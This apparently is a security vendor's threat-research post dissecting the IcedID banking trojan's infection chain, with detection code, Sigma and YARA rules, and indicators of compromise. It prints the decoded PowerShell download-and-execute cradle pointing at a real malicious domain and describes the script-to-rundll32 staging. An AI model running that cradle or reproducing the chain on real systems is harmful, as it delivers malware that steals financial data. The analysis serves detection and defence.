Dissecting IcedID behavior on an infected endpoint

IcedID, also known as BokBot, is a banking trojan that was first discovered in 2017. It targets a victim's financial information and is also capable of dropping other malware, most commonly Cobalt Strike.

OpenText™ Cybersecurity Services observed a recent malspam campaign in which IcedID was delivered as a zip archive containing a Visual Basic script.

The OpenText Services Team, as part of its threat research activities, continuously monitors how malware behaves on the endpoint and creates alerting content for the OpenText Managed Extended Detection and Response (MxDR) Service and its Managed Security Services customers.

Infection Chain 

Upon execution, the malicious JavaScript associated with the IcedID infection calls the command interpreter to run a base64-encoded Windows PowerShell command. That PowerShell command connects outbound to an IcedID redirect domain and then downloads a malicious DLL file. Next, PowerShell executes the downloaded DLL via the Rundll process. Finally, the DLL launches a Command and Control (C2) client that generates traffic to the IcedID C2 server.
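As an added example (not from the original post and not OpenText's own alerting content), the following Python classifies constructed process-creation events against the four stages of that chain, decoding the -EncodedCommand payload to look for the IEX/DownloadString cradle; the event field names, file paths and URL are assumptions.

```python
import base64
import re

# Constructed sample events (not from the post) mirroring the chain above; the URL is a placeholder.
CRADLE = 'IEX (New-Object Net.Webclient).downloadstring("http://redirect.example/gatef1.php")'
ENCODED_PS = base64.b64encode(CRADLE.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\wscript.exe",
     "cmdline": r"C:\Windows\System32\WScript.exe C:\Users\Administrator\Downloads\scan_contract.js"},
    {"parent": r"C:\Windows\System32\wscript.exe", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c powershell -enc " + ENCODED_PS},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -EncodedCommand " + ENCODED_PS},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r"rundll32.exe C:\Users\Administrator\AppData\Local\Temp\loader.dll,#1"},
]
ENC_FLAG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)

def decode_encoded_command(cmdline):
    """Decode the base64/UTF-16LE payload of -EncodedCommand; None if absent or malformed."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the names of the chain stages a single process-creation event matches."""
    parent, image, cmd = event["parent"].lower(), event["image"].lower(), event["cmdline"]
    hits = []
    # Stage 1: explorer launching the script host on a .js file in the Downloads folder
    if image.endswith("wscript.exe") and parent.endswith("explorer.exe") \
            and re.search(r"\\downloads\\\S+\.js\b", cmd, re.I):
        hits.append("script_host_from_downloads")
    # Stage 2: the script host handing off to the command interpreter
    if image.endswith("cmd.exe") and parent.endswith("wscript.exe"):
        hits.append("cmd_spawned_by_script_host")
    # Stage 3: encoded PowerShell that is a download cradle (IEX + DownloadString)
    decoded = decode_encoded_command(cmd)
    if decoded and re.search(r"\biex\b", decoded, re.I) and "downloadstring" in decoded.lower():
        hits.append("encoded_ps_download_cradle")
    # Stage 4: rundll32 loading a DLL out of the user's Local Temp directory
    if image.endswith("rundll32.exe") and re.search(r"\\appdata\\local\\temp\\[^\s,]+\.dll", cmd, re.I):
        hits.append("rundll32_dll_from_temp")
    return hits
```

Any single stage fires on its own in normal administration now and then; it is the sequence of stages under one process tree that is the strong signal.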

WScript process interacting with a JavaScript file in the user's Downloads folder
Sigma Rule – Command and Scripting Visual Basic

Parent Process: C:\Windows\explorer.exe
Child Process: C:\Windows\System32\wscript.exe
CommandLine: C:\Windows\System32\WScript.exe:C:\Users\Administrator\Downloads\scan_contract.js

WScript process interacting with Cmd Process to execute PowerShell

Parent Process: C:\Windows\System32\wscript.exe
Child Process: C:\Windows\System32\cmd.exe

Command Interpreter interacting with PowerShell to run a Base64 Encoded script

Decoded Base64 Script:
IEX (New-Object Net.Webclient).downloadstring("http://shisyatnic[.]top/gatef1.php")

Parent Process: C:\Windows\System32\cmd.exe
Child Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Sigma Rule – Encoded PowerShell used to download and execute malicious DLL
PowerShell creating an outbound network connection to download IcedID DLL
IcedID redirect to malicious DLL download location
Download of the malicious IcedID DLL
PowerShell executing downloaded DLL file
PowerShell executing DLL from Local Temp directory
Rundll creating an outbound network connection to IcedID C2
OpenText MDR Agent continuously scans host memory and alerts on the execution of unsigned or untrusted DLLs
Strings analysis of the DLL dumped from memory, identifying strings commonly used in IcedID DLLs (partial list shown)

Yara Rule for IcedID identification:

rule IcedID_Malware {
    meta:
        author = "OpenText"
        description = "Detects IcedID"
    strings:
        // HTTP method and the cookie-style parameter names IcedID places in its C2 request
        $s1 = "POST" fullword wide
        $s2 = "; _ga=" fullword wide
        $s3 = "; _u=" fullword wide
        $s4 = "; __io=" fullword wide
        $s5 = "; _gid=" fullword wide
        $s6 = "Cookie: _s=" fullword wide
    condition:
        all of ($s*)
}

Indicators of Compromise:
IcedID Redirect Domain: shisyatnic[.]top/gatef1.php
IcedID DLL Hosting Domain: shisyatnic[.]top/dll/loader_p1_dll_64_n1_x64_inf.dll77.dll
IcedID C2: skanfordiporka[.]com
IcedID JavaScript: MD5 Hash – fb1a30af0da989004eaeeac8e72778df
IcedID DLL: MD5 Hash – 658f14c5d83de5e5fee5f5ae00087139

OpenText Cybersecurity Services

Upon detection of malware such as IcedID, OpenText recommends that an Incident Response engagement be carried out. Our Consulting Team uses its extensive experience to threat hunt and remediate any suspected cyber attack. Customers rely on OpenText for Digital Forensics and Incident Response as well as our Risk & Compliance Advisory and Managed Security Services. Learn more about our Services.
